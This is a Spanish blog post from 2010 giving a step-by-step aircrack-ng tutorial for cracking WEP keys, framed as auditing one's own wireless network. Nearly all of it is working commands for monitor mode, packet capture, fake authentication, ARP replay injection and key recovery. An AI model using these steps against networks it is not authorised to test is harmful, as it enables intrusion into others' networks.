sábado, 3 de julio de 2010

Manual facil y sencillo de aircrack en redes WEP

Como comprobar la seguridad de nuestra red wireless y la robustez de nuestra clave con la sencilla aplicación AirCrack-ng, paso a paso.

Es muy sencillo conseguirla ya que se encuentra en los repositorios de Linux, así que instalando Ubuntu 10.04, conexión a internet y una tarjeta Wireless ya podemos ir tirando.

Primero nos logueamos como root:


david@laptop:~$ su -l
Password:
root@laptop:~#
----> y entramos en nuestra carpeta de documentos, luego veremos por qué.

root@laptop:~# cd /home/(miusuario)/Documents/direcotorioqueyoquiera

Si no tenemos habilitado el root podemos hacerlo de la siguiente manera:

david@laptop:~$ sudo passwd root
[sudo] password for david:
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

---->también deberemos entrar en la carpeta documentos.
root@laptop:~# cd /home/(miusuario)/Documents/directorioqueyoquiera


O poniendo “sudo” delante de TODOS los comandos que relato a continuación.

---->En este caso tendremos que hacer en command console (terminal)...
$cd directorioqueyoquiera

Despues descargamos el programa entrando en consola la siguiente línea.

#apt-get install aircrack-ng

Y ya está instalado, facil.

Este paquete incluye:

airodump-ng
airmon-ng
aircrack-ng
aireplay-ng

… entre otros... Pero para lo que muestro a continuación solo necesitaremos las que ya he citado. Comenzamos el mogollón.

Primero:
Averiguamos nuestra propia MAC con el comando ifconfig, así a secas.

root@laptop:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr (aqui te pone la MAC)
inet addr:192.168.1.35 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fxxxxxxxxxxxxxxxxxxxxxxxxx Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5171 errors:0 dropped:0 overruns:0 frame:0
TX packets:5543 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5279816 (5.2 MB) TX bytes:1056334 (1.0 MB)

Segundo:
Arrancamos la interfaz.

root@laptop:~# airmon-ng start wlan0

Es posible que dé algunos errores pero aún así contunaremos adelante.

Tercero:
Escaneamos en busca de nuestra red, con este comando nos mostrará todas las redes a su alcance, algunas incluso ocultas.

root@laptop:~# airodump-ng mon0


CH “número de canal” ][ Elapsed: 0 s ][ 2010-06-29 23:29

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID


(MacPuntoAcceso) -88 240 0 9 54 . (tipoenc)(tipocifrado) (RED)



Ya tenemos algunos datos que vemos que se publican, la MAC, el tipo de cifrado y el nombre de la red. Además veremos dispositivos inalámbricos en el alcance de nuestra wifi y sus números de MAC.

Si queremos ver porque no hay que poner claves encriptación WEP, solo tenemos que seguir los siguientes pasos.



root@laptop:~#sudo airodump-ng -c (número de canal) -w (RED) mon0 7

Los datos que nos muestra a continuación son los mismos que anteriormente, pero hemos limitado el escaneo al canal (número de canal) y a la red (RED). Además estamos estableciendo un enlace a través del interfaz lógico mon0. Este enlace nos hará falta en los siguientes comandos.
Abrimos otra terminal sin cerrar la anterior y:

root@laptop:~#sudo aireplay-ng -3 -e (RED) -b (MacPuntoAcceso) -h (NuestraMac) mon0

Con este sencillo comando estamos capturando los paquetes ARP que se guardarán con la extensión “.cap”, en la carpeta /home/usuario/Documents/directorioqueyoquiera.

Por esto al principio dije que había que acceder a esta carpeta, porque este comando genera un “chorreo” de archivos cap, que para eliminarlos, digamos que sería incomodo y mejor que no estén mezclados con nuestros archivos personales. Pero continuemos.

Abrimos otra command console e introducimos:

#aireplay-ng -1 6000 -q 10 -o 1 -e (RED) -a (MacPuntoAcceso) -h (NuestraMac) mon0
Con esto realizamos el enlace solicitamos paquetes ARP al punto de acceso.

Y a esperar a que juntemos por lo menos 200000 ARP's para estar seguros.

Cuando terminemos detenemos los procesos con ctrl+c o cerrando directamente la consola y abrimos el directorio que hayamos definido antes.

#aircrack-ng *.cap

...

KEY FOUND! [ (un chorro de números alfanum que no interesan) ] (ASCII: (nuestra clave encriptada) )


Y ya está, así que siempre que creemos una red inalámbrica, mejor la configuramos con un tipo de encriptación WPA o WPA2. Lo cual, si lo que queremos hacer es crear una red ad-hoc inalámbrica es bastante dificil, pero eso ya lo veremos en el siguiente post.

No hay comentarios: